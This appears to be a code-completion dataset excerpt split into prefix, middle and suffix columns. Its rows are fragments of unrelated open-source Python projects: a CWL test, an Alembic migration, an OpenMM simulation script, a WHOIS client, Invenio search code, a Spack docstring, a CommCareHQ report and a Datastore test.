prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
from io import StringIO
from pathlib import Path

from cwltool.main import main

from .util import get_data


def test_empty_input(tmp_path: Path) -> None:
    """Affirm that an empty JSON job input ("{}") runs successfully."""
    empty_json = "{}"
    empty_input = StringIO(empty_json)
    params = [
        "--outdir",
        str(tmp_path),
        get_data("tests/wf/no-parameters-echo.cwl"),
        "-",  # read the job input from stdin
    ]
    try:
        # main() returns 0 on success; some code paths raise SystemExit instead,
        # so accept either form of a zero exit status.
        assert main(params, stdin=empty_input) == 0
    except SystemExit as err:
        assert err.code == 0
|
""" Extend suppliers table with new fields (to be initially populated from declaration data)
Revision ID: 940
Revises: 930
Create Date: 2017-08-16 16:39:00.000000
"""
# revision identifiers, used by Alembic.
revision = '940'
down_revision = '930'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add the new supplier-declaration columns.

    All columns are nullable so existing supplier rows remain valid; they are
    expected to be back-filled from declaration data.
    """
    op.add_column(u'suppliers', sa.Column('registered_name', sa.String(), nullable=True))
    op.add_column(u'suppliers', sa.Column('registration_country', sa.String(), nullable=True))
    op.add_column(u'suppliers', sa.Column('other_company_registration_number', sa.String(), nullable=True))
    op.add_column(u'suppliers', sa.Column('registration_date', sa.DateTime(), nullable=True))
    op.add_column(u'suppliers', sa.Column('vat_number', sa.String(), nullable=True))
    op.add_column(u'suppliers', sa.Column('organisation_size', sa.String(), nullable=True))
    op.add_column(u'suppliers', sa.Column('trading_status', sa.String(), nullable=True))
def downgrade():
    """Drop every column added by revision 940."""
    for dropped_column in (
        'registered_name',
        'registration_country',
        'other_company_registration_number',
        'registration_date',
        'vat_number',
        'organisation_size',
        'trading_status',
    ):
        op.drop_column(u'suppliers', dropped_column)
|
r.add_argument("--fc_step", type=float, default=CONFIG_34, help="the value by which the force constant is increased each time (for force_constant_adjustable mode)")
# Remaining CLI options for the force-constant-adjustable workflow
# (the ArgumentParser itself is created earlier in the file).
parser.add_argument("--distance_tolerance", type=float, default=CONFIG_35, help="max distance allowed between center of data cloud and potential center (for force_constant_adjustable mode)")
parser.add_argument("--autoencoder_file", type=str, help="pkl file that stores autoencoder (for force_constant_adjustable mode)")
parser.add_argument("--remove_previous", help="remove previous outputs while adjusting force constants", action="store_true")
args = parser.parse_args()

# Unpack the frequently used options into module-level names.
record_interval = args.record_interval
total_number_of_steps = args.total_num_of_steps
# data_type_in_input_layer is used as an index into this fixed list of representations.
input_data_type = ['cossin', 'Cartesian', 'pairwise'][args.data_type_in_input_layer]
force_constant = args.force_constant
scaling_factor = args.scaling_factor
# Strip brackets/quotes/spaces from list-like CLI strings such as '[a, b]' before splitting.
layer_types = re.sub("\[|\]|\"|\'| ",'', args.layer_types).split(',')
num_of_nodes = re.sub("\[|\]|\"|\'| ",'', args.num_of_nodes).split(',')
num_of_nodes = [int(item) for item in num_of_nodes]
# Output trajectory format defaults to DCD unless an explicit output path fixes the extension.
out_format = '.dcd' if args.out_traj is None else os.path.splitext(args.out_traj)[1]
if float(force_constant) != 0:
    # The ANN bias machinery is only imported for biased runs; presumably the
    # import is deferred because it is expensive or optional -- TODO confirm.
    from ANN import *
folder_to_store_output_files = args.folder_to_store_output_files # this is used to separate outputs for different networks into different folders
autoencoder_info_file = args.autoencoder_info_file
# The potential center arrives as a string like '"pc_1.0,2.0"': drop the quotes
# and the 'pc_' prefix, then parse the comma-separated floats.
potential_center = list([float(x) for x in args.pc_potential_center.replace('"','')\
                                .replace('pc_','').split(',')]) # this API is the generalization for higher-dimensional cases
if not os.path.exists(folder_to_store_output_files):
    # Best-effort creation: a concurrent process may have created it already.
    try: os.makedirs(folder_to_store_output_files)
    except: pass
def run_simulation(force_constant):
assert(os.path.exists(folder_to_store_output_files))
input_pdb_file_of_molecule = args.starting_pdb_file
force_field_file = 'amber99sb.xml'
water_field_file = 'tip3p.xml'
pdb_reporter_file = '%s/output_fc_%f_pc_%s.pdb' %(folder_to_store_output_files, force_constant, str(potential_center).replace(' ',''))
if not args.out_traj is None:
pdb_reporter_file = args.out_traj
state_data_reporter_file = pdb_reporter_file.replace('output_fc', 'report_fc').replace('.pdb', '.txt')
# check if the file exist
for item_filename in [pdb_reporter_file, state_data_reporter_file]:
Helper_func.backup_rename_file_if_exists(item_filename)
index_of_backbone_atoms = CONFIG_57[0]
flag_random_seed = 0 # whether we need to fix this random seed
simulation_temperature = args.temperature
time_step = CONFIG_22 # simulation time step, in ps
pdb = PDBFile(input_pdb_file_of_molecule)
modeller = Modeller(pdb.topology, pdb.getPositions(frame=args.starting_frame))
solvent_opt = 'no_water'
if solvent_opt == 'explicit':
forcefield = ForceField(force_field_file, water_field_file)
modeller.addSolvent(forcefield, model=water_field_file.split('.xml')[0], boxSize=Vec3(3, 3, 3) * nanometers,
ionicStrength=0 * molar)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=PME, nonbondedCutoff=1.0 * nanometers,
constraints=AllBonds, ewaldErrorTolerance=0.0005)
else:
forcefield = ForceField(force_field_file)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=NoCutoff, constraints=AllBonds)
if args.bias_method == "US":
if float(force_constant) != 0:
force = ANN_Force()
force.set_layer_types | (layer_types)
force.set_data_type_in_input_layer(args.data_type_in_input_layer)
force.set_list_of_index_of_atoms_forming_dihedrals_from_index_of_backbone_atoms(index_of_backbone_atoms)
force.set_index_of_backbone_atoms(index_of_backbone_atoms)
if args.data_type_in_input_layer == 2:
| force.set_list_of_pair_index_for_distances(CONFIG_80)
force.set_num_of_nodes(num_of_nodes)
force.set_potential_center(potential_center)
force.set_force_constant(float(force_constant))
unit_scaling = 1.0 # TODO: check unit scaling
force.set_scaling_factor(float(scaling_factor) / unit_scaling) # since default unit is nm in OpenMM
# TODO: need to fix following for multi-hidden layer cases
temp_coeffs, temp_bias = np.load(autoencoder_info_file)
for item_layer_index in [0, 1]:
assert (len(temp_coeffs[item_layer_index]) ==
num_of_nodes[item_layer_index] * num_of_nodes[item_layer_index + 1]), (len(temp_coeffs[item_layer_index]),
(num_of_nodes[item_layer_index], num_of_nodes[item_layer_index + 1]))
assert (len(temp_bias[item_layer_index]) == num_of_nodes[item_layer_index + 1]), (len(temp_bias[item_layer_index]), num_of_nodes[item_layer_index + 1])
# need tolist() since C++ only accepts Python list
force.set_coeffients_of_connections([item_w.tolist() for item_w in temp_coeffs])
force.set_values_of_biased_nodes([item_w.tolist() for item_w in temp_bias])
system.addForce(force)
elif args.bias_method == "US_on_phipsi":
from openmmplumed import PlumedForce
kappa_string = ','.join([str(force_constant) for _ in potential_center])
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: RESTRAINT ARG=phi,psi AT=%f,%f KAPPA=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (potential_center[0], potential_center[1], kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "MTD":
from openmmplumed import PlumedForce
plumed_force_string = Alanine_dipeptide.get_expression_script_for_plumed()
with open(autoencoder_info_file, 'r') as f_in:
plumed_force_string += f_in.read()
# note that dimensionality of MTD is determined by potential_center string
plumed_script_ANN_mode = 'ANN'
if plumed_script_ANN_mode == 'native':
mtd_output_layer_string = ['l_2_out_%d' % item for item in range(len(potential_center))]
elif plumed_script_ANN_mode == 'ANN':
mtd_output_layer_string = ['ann_force.%d' % item for item in range(len(potential_center))]
else: raise Exception('mode error')
mtd_output_layer_string = ','.join(mtd_output_layer_string)
mtd_sigma_string = ','.join([str(args.MTD_sigma) for _ in range(len(potential_center))])
if args.MTD_WT:
mtd_well_tempered_string = 'TEMP=%d BIASFACTOR=%f' % (args.temperature, args.MTD_biasfactor)
else:
mtd_well_tempered_string = ""
plumed_force_string += """
metad: METAD ARG=%s PACE=%d HEIGHT=%f SIGMA=%s FILE=temp_MTD_hills.txt %s
PRINT STRIDE=%d ARG=%s,metad.bias FILE=temp_MTD_out.txt
""" % (mtd_output_layer_string, args.MTD_pace, args.MTD_height, mtd_sigma_string, mtd_well_tempered_string,
record_interval, mtd_output_layer_string)
# print plumed_force_string
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "SMD":
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '1000,1000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: MOVINGRESTRAINT ARG=phi,psi AT0=-1.5,1.0 STEP0=0 KAPPA0=%s AT1=1.0,-1.0 STEP1=%d KAPPA1=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (kappa_string, total_number_of_steps, kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "TMD": # targeted MD
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '10000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
rmsd: RMSD REFERENCE=../resources/alanine_ref_1_TMD.pdb TYPE=OPTIMAL
restraint: MOVINGRESTRAINT ARG=rmsd AT0=0 STEP0=0 KAPPA0=0 AT1=0 STEP1=%d KAPPA1 |
import socket, re, sys
from codecs import encode, decode
from . import shared
def get_whois_raw(domain, server="", previous=None, rfc3490=True, never_cut=False, with_server_list=False, server_list=None):
    """Fetch the raw WHOIS response(s) for `domain`, following referrals.

    Returns the list of responses, most recent first, or a
    ``(responses, servers)`` tuple when `with_server_list` is True.
    """
    previous = previous or []
    server_list = server_list or []
    # Sometimes IANA simply won't give us the right root WHOIS server
    exceptions = {
        ".ac.uk": "whois.ja.net",
        ".ps": "whois.pnina.ps",
        ".buzz": "whois.nic.buzz",
        ".moe": "whois.nic.moe",
        # The following is a bit hacky, but IANA won't return the right answer for example.com because it's a direct registration.
        "example.com": "whois.verisign-grs.com",
    }
    if rfc3490:
        # Normalize internationalized domain names to their IDNA/ASCII form.
        if sys.version_info < (3, 0):
            domain = encode(domain if type(domain) is unicode else decode(domain, "utf8"), "idna")
        else:
            domain = encode(domain, "idna").decode("ascii")
    if len(previous) == 0 and server == "":
        # Root query: pick the hard-coded exception server or ask IANA.
        is_exception = False
        for exception, exc_serv in exceptions.items():
            if domain.endswith(exception):
                is_exception = True
                target_server = exc_serv
                break
        if not is_exception:
            target_server = get_root_server(domain)
    else:
        target_server = server
    # Per-registry query quirks.
    if target_server == "whois.jprs.jp":
        request_domain = "%s/e" % domain  # Suppress Japanese output
    elif domain.endswith(".de") and (target_server == "whois.denic.de" or target_server == "de.whois-servers.net"):
        request_domain = "-T dn,ace %s" % domain  # regional specific stuff
    elif target_server == "whois.verisign-grs.com":
        request_domain = "=%s" % domain  # Avoid partial matches
    else:
        request_domain = domain
    response = whois_request(request_domain, target_server)
    if never_cut:
        # If the caller has requested to 'never cut' responses, he will get the original response from the server (this is
        # useful for callers that are only interested in the raw data). Otherwise, if the target is verisign-grs, we will
        # select the data relevant to the requested domain, and discard the rest, so that in a multiple-option response the
        # parsing code will only touch the information relevant to the requested domain. The side-effect of this is that
        # when `never_cut` is set to False, any verisign-grs responses in the raw data will be missing header, footer, and
        # alternative domain options (this is handled a few lines below, after the verisign-grs processing).
        new_list = [response] + previous
    if target_server == "whois.verisign-grs.com":
        # VeriSign is a little... special. As it may return multiple full records and there's no way to do an exact query,
        # we need to actually find the correct record in the list. re.escape guards
        # against regex metacharacters (e.g. '.') in the domain itself.
        for record in response.split("\n\n"):
            if re.search(r"Domain Name: %s\n" % re.escape(domain.upper()), record):
                response = record
                break
    if not never_cut:
        new_list = [response] + previous
    server_list.append(target_server)
    for line in [x.strip() for x in response.splitlines()]:
        match = re.match(r"(refer|whois server|referral url|whois server|registrar whois):\s*([^\s]+\.[^\s]+)", line, re.IGNORECASE)
        if match is not None:
            referral_server = match.group(2)
            if referral_server != server and "://" not in referral_server:  # We want to ignore anything non-WHOIS (eg. HTTP) for now.
                # Referral to another WHOIS server...
                return get_whois_raw(domain, referral_server, new_list, server_list=server_list, with_server_list=with_server_list)
    if with_server_list:
        return (new_list, server_list)
    else:
        return new_list
def get_root_server(domain):
    """Ask IANA for the authoritative root WHOIS server for `domain`.

    Raises shared.WhoisException when IANA's response has no 'refer:' line.
    """
    data = whois_request(domain, "whois.iana.org")
    for line in (x.strip() for x in data.splitlines()):
        # Raw string: '\s' is a regex escape, not a string escape.
        match = re.match(r"refer:\s*([^\s]+)", line)
        if match is None:
            continue
        return match.group(1)
    raise shared.WhoisException("No root WHOIS server found for domain.")
def whois_request(domain, server, port=43):
    """Send one WHOIS query to `server` and return the full decoded response.

    The previous implementation set the process-wide default socket timeout
    (socket.setdefaulttimeout) and never closed the socket; the timeout is now
    applied to this connection only, and the socket is always closed.
    """
    sock = socket.create_connection((server, port), timeout=5)
    try:
        # sendall() guarantees the whole query is written (send() may be partial).
        sock.sendall(("%s\r\n" % domain).encode("utf-8"))
        chunks = []
        while True:
            data = sock.recv(1024)
            if not data:  # empty read == peer closed the connection
                break
            chunks.append(data)
    finally:
        sock.close()
    return b"".join(chunks).decode("utf-8")
|
of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio Search Engine in mod_python."""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
## import general modules:
import cgi
import cStringIO
import copy
import string
import os
import re
import time
import urllib
import urlparse
import zlib
import sys
try:
## import optional module:
import numpy
CFG_NUMPY_IMPORTABLE = True
except:
CFG_NUMPY_IMPORTABLE = False
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
## import Invenio stuff:
from invenio.config import \
CFG_CERN_SITE, \
CFG_INSPIRE_SITE, \
CFG_OAI_ID_FIELD, \
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBSEARCH_CALL_BIBFORMAT, \
CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX, \
CFG_WEBSEARCH_FIELDS_CONVERT, \
CFG_WEBSEARCH_NB_RECORDS_TO_SORT, \
CFG_WEBSEARCH_SEARCH_CACHE_SIZE, \
CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT, \
CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS, \
CFG_WEBSEARCH_USE_ALEPH_SYSNOS, \
CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, \
CFG_WEBSEARCH_FULLTEXT_SNIPPETS, \
CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS, \
CFG_WEBSEARCH_WILDCARD_LIMIT, \
CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE, \
CFG_BIBUPLOAD_EXTERNAL_SYSNO_TAG, \
CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS, \
CFG_WEBSEARCH_SYNONYM_KBRS, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_LOGDIR, \
CFG_BIBFORMAT_HIDDEN_TAGS, \
CFG_SITE_URL, \
CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS, \
CFG_SOLR_URL, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
CFG_SITE_RECORD, \
CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT, \
CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY, \
CFG_BIBSORT_BUCKETS, \
CFG_XAPIAN_ENABLED, \
CFG_BIBINDEX_CHARS_PUNCTUATION
from invenio.search_engine_config import \
InvenioWebSearchUnknownCollectionError, \
InvenioWebSearchWildcardLimitError, \
CFG_WEBSEARCH_IDXPAIRS_FIELDS,\
CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH, \
CFG_SEARCH_RESULTS_CACHE_PREFIX
from invenio.search_engine_utils import get_fieldvalues, get_fieldvalues_alephseq_like
from invenio.bibrecord import create_record, record_xml_output
from invenio.bibrank_record_sorter import get_bibrank_methods, is_method_valid, rank_records as rank_records_bibrank
from invenio.bibrank_downloads_similarity import register_page_view_event, calculate_reading_similarity_list
from invenio.bibindex_engine_stemmer import stem
from invenio.bibindex_tokenizers.BibIndexDefaultTokenizer import BibIndexDefaultTokenizer
from invenio.bibindex_tokenizers.BibIndexCJKTokenizer import BibIndexCJKTokenizer, is_there_any_CJK_character_in_text
from invenio.bibindex_engine_utils import author_name_requires_phrase_search
from invenio.bibindex_engine_washer import wash_index_term, lower_index_term, wash_author_name
from invenio.bibindex_engine_config import CFG_BIBINDEX_SYNONYM_MATCH_TYPE
from invenio.bibindex_engine_utils import get_idx_indexer
from invenio.bibformat import format_record, format_records, get_output_format_content_type, create_excel
from invenio.bibformat_config import CFG_BIBFORMAT_USE_OLD_BIBFORMAT
from invenio.bibrank_downloads_grapher import create_download_history_graph_and_box
from invenio.bibknowledge import get_kbr_values
from invenio.data_cacher import DataCacher
from invenio.websearch_external_collections import prin | t_external_results_overview, perform_external_collection_search
from invenio.access_control_admin import acc_get_action_id
from invenio.access_control_config import VIEWRESTRCOLL, \
CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS, \
CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
from invenio.websearchadminlib import get_detailed_page_tabs, get_detailed_page_tabs_counts
from invenio.intbitset import intbitset
from inve | nio.dbquery import DatabaseError, deserialize_via_marshal, InvenioDbQueryWildcardLimitError
from invenio.access_control_engine import acc_authorize_action
from invenio.errorlib import register_exception
from invenio.textutils import encode_for_xml, wash_for_utf8, strip_accents
from invenio.htmlutils import get_mathjax_header
from invenio.htmlutils import nmtoken_from_string
import invenio.template
webstyle_templates = invenio.template.load('webstyle')
webcomment_templates = invenio.template.load('webcomment')
from invenio.bibrank_citation_searcher import calculate_cited_by_list, \
calculate_co_cited_with_list, get_records_with_num_cites, get_self_cited_by, \
get_refersto_hitset, get_citedby_hitset
from invenio.bibrank_citation_grapher import create_citation_history_graph_and_box
from invenio.dbquery import run_sql, run_sql_with_limit, wash_table_column_name, \
get_table_update_time
from invenio.webuser import getUid, collect_user_info, session_param_set
from invenio.webpage import pageheaderonly, pagefooteronly, create_error_box, write_warning
from invenio.messages import gettext_set_language
from invenio.search_engine_query_parser import SearchQueryParenthesisedParser, \
SpiresToInvenioSyntaxConverter
from invenio import webinterface_handler_config as apache
from invenio.solrutils_bibindex_searcher import solr_get_bitset
from invenio.xapianutils_bibindex_searcher import xapian_get_bitset
try:
import invenio.template
websearch_templates = invenio.template.load('websearch')
except:
pass
from invenio.websearch_external_collections import calculate_hosted_collections_results, do_calculate_hosted_collections_results
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH
from invenio.websearch_external_collections_config import CFG_EXTERNAL_COLLECTION_MAXRESULTS
VIEWRESTRCOLL_ID = acc_get_action_id(VIEWRESTRCOLL)
## global vars:
cfg_nb_browse_seen_records = 100 # limit of the number of records to check when browsing certain collection
cfg_nicely_ordered_collection_list = 0 # do we propose collection list nicely ordered or alphabetical?
## precompile some often-used regexp for speed reasons:
## (raw strings throughout: '\s' etc. are regex escapes, not string escapes)
re_word = re.compile(r'[\s]')
re_quotes = re.compile(r'[\'\"]')
re_doublequote = re.compile(r'\"')
re_logical_and = re.compile(r'\sand\s', re.I)
re_logical_or = re.compile(r'\sor\s', re.I)
re_logical_not = re.compile(r'\snot\s', re.I)
re_operators = re.compile(r'\s([\+\-\|])\s')
re_pattern_wildcards_after_spaces = re.compile(r'(\s)[\*\%]+')
re_pattern_single_quotes = re.compile(r"'(.*?)'")
re_pattern_double_quotes = re.compile(r'\"(.*?)\"')
re_pattern_parens_quotes = re.compile(r'[\'\"]{1}[^\'\"]*(\([^\'\"]*\))[^\'\"]*[\'\"]{1}')
re_pattern_regexp_quotes = re.compile(r"\/(.*?)\/")
re_pattern_spaces_after_colon = re.compile(r'(:\s+)')
re_pattern_short_words = re.compile(r'([\s\"]\w{1,3})[\*\%]+')
re_pattern_space = re.compile("__SPACE__")
re_pattern_today = re.compile(r"\$TODAY\$")
re_pattern_parens = re.compile(r'\([^\)]+\s+[^\)]+\)')
re_punctuation_followed_by_space = re.compile(CFG_BIBINDEX_CHARS_PUNCTUATION + r'\s')
## em possible values
# NOTE(review): presumably maps the values accepted by the 'em' request
# parameter to the short internal codes for page elements -- confirm with callers.
EM_REPOSITORY = {
    "body": "B",
    "header": "H",
    "footer": "F",
    "search_box": "S",
    "see_also_box": "L",
    "basket": "K",
    "alert": "A",
    "search_info": "I",
    "overview": "O",
    "all_portalboxes": "P",
    "te_portalbox": "Pte",
    "tp_portalbox": "Ptp",
    "np_portalbox": "Pnp",
    "ne_portalbox": "Pne",
    "lt_portalbox": "Plt",
    "rt_portalbox": "Prt",
}
cla |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This module contains external, potentially separately licensed,
packages that are included in spack.
So far:
argparse: We include our own version to be Python 2.6 compatible.
distro: Provides a more stable linux distribution detection.
functools: Used for implementation of total_ordering.
jinja2: A modern and designer-friendly templating language for Python
jsonschema: An implementation of JSON Schema for Python.
ordereddict: We include our own version to be Python 2.6 compatible.
py: Needed by pytest. Library with cross-python path,
ini-parsing, io, code, and log facilities.
pyqver2: External script to query required python version of
python source code. Used for ensuring 2.6 compatibility.
pytest: Testing framework used by Spack.
yaml: Used for config files.
"""
|
ngo.utils.translation import ugettext_lazy
from memoized import memoized
from corehq import privileges
from corehq.apps.accounting.models import BillingAccount
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.dispatcher import UserManagementReportDispatcher
from corehq.apps.reports.filters.users import (
ChangeActionFilter,
ChangedByUserFilter,
EnterpriseUserFilter,
)
from corehq.apps.reports.filters.users import \
ExpandedMobileWorkerFilter as EMWF
from corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin, PaginatedReportMixin
from corehq.apps.reports.standard import DatespanMixin, ProjectReport
from corehq.apps.users.audit.change_messages import (
ASSIGNED_LOCATIONS_FIELD,
CHANGE_MESSAGES_FIELDS,
DOMAIN_FIELD,
LOCATION_FIELD,
PHONE_NUMBERS_FIELD,
ROLE_FIELD,
TWO_FACTOR_FIELD,
get_messages,
)
from corehq.apps.users.models import UserHistory
from corehq.const import USER_DATETIME_FORMAT
from corehq.util.timezones.conversions import ServerTime
class UserHistoryReport(GetParamsMixin, DatespanMixin, GenericTabularReport, ProjectReport, PaginatedReportMixin):
    """Paginated audit report of the changes made to users in a project."""
    slug = 'user_history'
    name = ugettext_lazy("User History")
    section_name = ugettext_lazy("User Management")
    dispatcher = UserManagementReportDispatcher

    # Filter controls rendered above the report, identified by dotted path.
    fields = [
        'corehq.apps.reports.filters.users.AffectedUserFilter',
        'corehq.apps.reports.filters.users.ChangedByUserFilter',
        'corehq.apps.reports.filters.dates.DatespanFilter',
        'corehq.apps.reports.filters.users.ChangeActionFilter',
        'corehq.apps.reports.filters.users.UserPropertyFilter',
        'corehq.apps.reports.filters.users.UserUploadRecordFilter',
    ]
    description = ugettext_lazy("History of user updates")
    ajax_pagination = True
    # Newest changes first by default.
    default_sort = {'changed_at': 'desc'}
@classmethod
def get_primary_properties(cls, domain):
    """
    Get slugs and human-friendly names for the properties that are available
    for filtering and/or displayed by default in the report, without
    needing to click "See More".
    """
    # Projects with the app-user-profiles privilege label the field differently.
    has_profiles = domain_has_privilege(domain, privileges.APP_USER_PROFILES)
    user_data_label = _("profile or user data") if has_profiles else _("user data")
    return {
        "username": _("username"),
        ROLE_FIELD: _("role"),
        "email": _("email"),
        DOMAIN_FIELD: _("project"),
        "is_active": _("is active"),
        "language": _("language"),
        PHONE_NUMBERS_FIELD: _("phone numbers"),
        LOCATION_FIELD: _("primary location"),
        "user_data": user_data_label,
        TWO_FACTOR_FIELD: _("two factor authentication disabled"),
        ASSIGNED_LOCATIONS_FIELD: _("assigned locations"),
    }
@property
def headers(self):
    """Datatable column headers; sortable columns carry their sort property name."""
    columns = (
        DataTablesColumn(_("Affected User"), sortable=False),
        DataTablesColumn(_("Modified by User"), sortable=False),
        DataTablesColumn(_("Action"), prop_name='action'),
        DataTablesColumn(_("Via"), prop_name='changed_via'),
        DataTablesColumn(_("Changes"), sortable=False),
        DataTablesColumn(_("Change Message"), sortable=False),
        DataTablesColumn(_("Timestamp"), prop_name='changed_at'),
    )
    return DataTablesHeader(*columns)
@property
def total_records(self):
    """Total number of matching audit records (drives pagination)."""
    queryset = self._get_queryset()
    return queryset.count()
@memoized
def _get_queryset(self):
    """Build the filtered UserHistory queryset from the request parameters."""
    affected_slugs = self.request.GET.getlist(EMWF.slug)
    affected_ids = self._get_user_ids(affected_slugs)
    # A user filter that matched nobody means there is nothing to show.
    if affected_slugs and not affected_ids:
        return UserHistory.objects.none()

    changed_by_slugs = self.request.GET.getlist(ChangedByUserFilter.slug)
    changed_by_ids = self._get_user_ids(changed_by_slugs)
    if changed_by_slugs and not changed_by_ids:
        return UserHistory.objects.none()

    return self._build_query(
        affected_ids,
        changed_by_ids,
        self.request.GET.get('user_property'),
        self.request.GET.getlist('action'),
        self.request.GET.get('user_upload_record'),
    )
def _get_user_ids(self, slugs):
    """Resolve user-filter slugs to the matching ES user ids."""
    return self._get_users_es_query(slugs).values_list('_id', flat=True)
def _get_users_es_query(self, slugs):
    """ES query for users visible to the requesting user, narrowed by slugs."""
    return EnterpriseUserFilter.user_es_query(self.domain, slugs, self.request.couch_user)
def _build_query(self, user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id):
    """AND together the individual report filters into one UserHistory queryset."""
    conditions = [Q(for_domain__in=self._for_domains())]
    if user_ids:
        conditions.append(Q(user_id__in=user_ids))
    if changed_by_user_ids:
        conditions.append(Q(changed_by__in=changed_by_user_ids))
    if user_property:
        conditions.append(self._get_property_filters(user_property))
    # Selecting 'ALL' disables action filtering entirely.
    if actions and ChangeActionFilter.ALL not in actions:
        conditions.append(Q(action__in=actions))
    if user_upload_record_id:
        conditions.append(Q(user_upload_record_id=user_upload_record_id))
    if self.datespan:
        conditions.append(Q(
            changed_at__lt=self.datespan.enddate_adjusted,
            changed_at__gte=self.datespan.startdate,
        ))
    combined = conditions[0]
    for condition in conditions[1:]:
        combined = combined & condition
    return UserHistory.objects.filter(combined)
def _for_domains(self):
    """Domains in this project's billing account; history is scoped to these."""
    account = BillingAccount.get_account_by_domain(self.domain)
    return account.get_domains()
@staticmethod
def _get_property_filters(user_property):
    """Q filter matching records where `user_property` was modified."""
    if user_property not in CHANGE_MESSAGES_FIELDS:
        return Q(changes__has_key=user_property)
    query_filters = Q(change_messages__has_key=user_property)
    # to include CommCareUser creation from UI where a location can be assigned as a part of user creation
    # which is tracked only under "changes" and not "change messages"
    if user_property == LOCATION_FIELD:
        query_filters = query_filters | Q(changes__has_key='location_id')
    return query_filters
@property
def rows(self):
    """Yield one formatted datatable row per audit record on the current page."""
    start = self.pagination.start
    page = self._get_queryset().order_by(self.ordering)[start:start + self.pagination.count]
    for record in page:
        yield self._user_history_row(record, self.domain, self.timezone)
@property
def ordering(self):
    """Django order_by expression derived from the datatable sort block."""
    sort_property, sort_direction = list(self.get_sorting_block()[0].items())[0]
    if sort_direction == 'desc':
        return '-' + sort_property
    return sort_property
@memoized
def _get_location_name(self, location_id):
    """Display name for a location id, or None when missing or unknown."""
    from corehq.apps.locations.models import SQLLocation
    if not location_id:
        return None
    try:
        location = SQLLocation.objects.get(location_id=location_id)
    except ObjectDoesNotExist:
        return None
    return location.display_name
def _user_history_row(self, record, domain, timezone):
    """Render a single UserHistory record as a datatable row."""
    local_time = ServerTime(record.changed_at).user_time(timezone)
    return [
        record.user_repr,
        record.changed_by_repr,
        _get_action_display(record.action),
        record.changed_via,
        self._user_history_details_cell(record.changes, domain),
        self._html_list(list(get_messages(record.change_messages))),
        local_time.ui_string(USER_DATETIME_FORMAT),
    ]
def _html_list(self, changes):
items = []
if isinstance(changes, dict):
for key, value in changes.items():
if isinstance(value, dict):
value = self._html_list(value)
elif isinstance(value, list):
value = format_html(", ".join(value))
else |
.key.project, key2.project)
self.assertEqual(ds_api.lookup.call_count, 2)
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_any_call(
self.PROJECT, [key2_pb], read_options=read_options
)
ds_api.lookup.assert_any_call(
self.PROJECT, [key1_pb, key2_pb], read_options=read_options
)
def test_get_multi_hit(self):
    """A single found entity comes back with a new, complete key."""
    from google.cloud.datastore_v1.proto import datastore_pb2
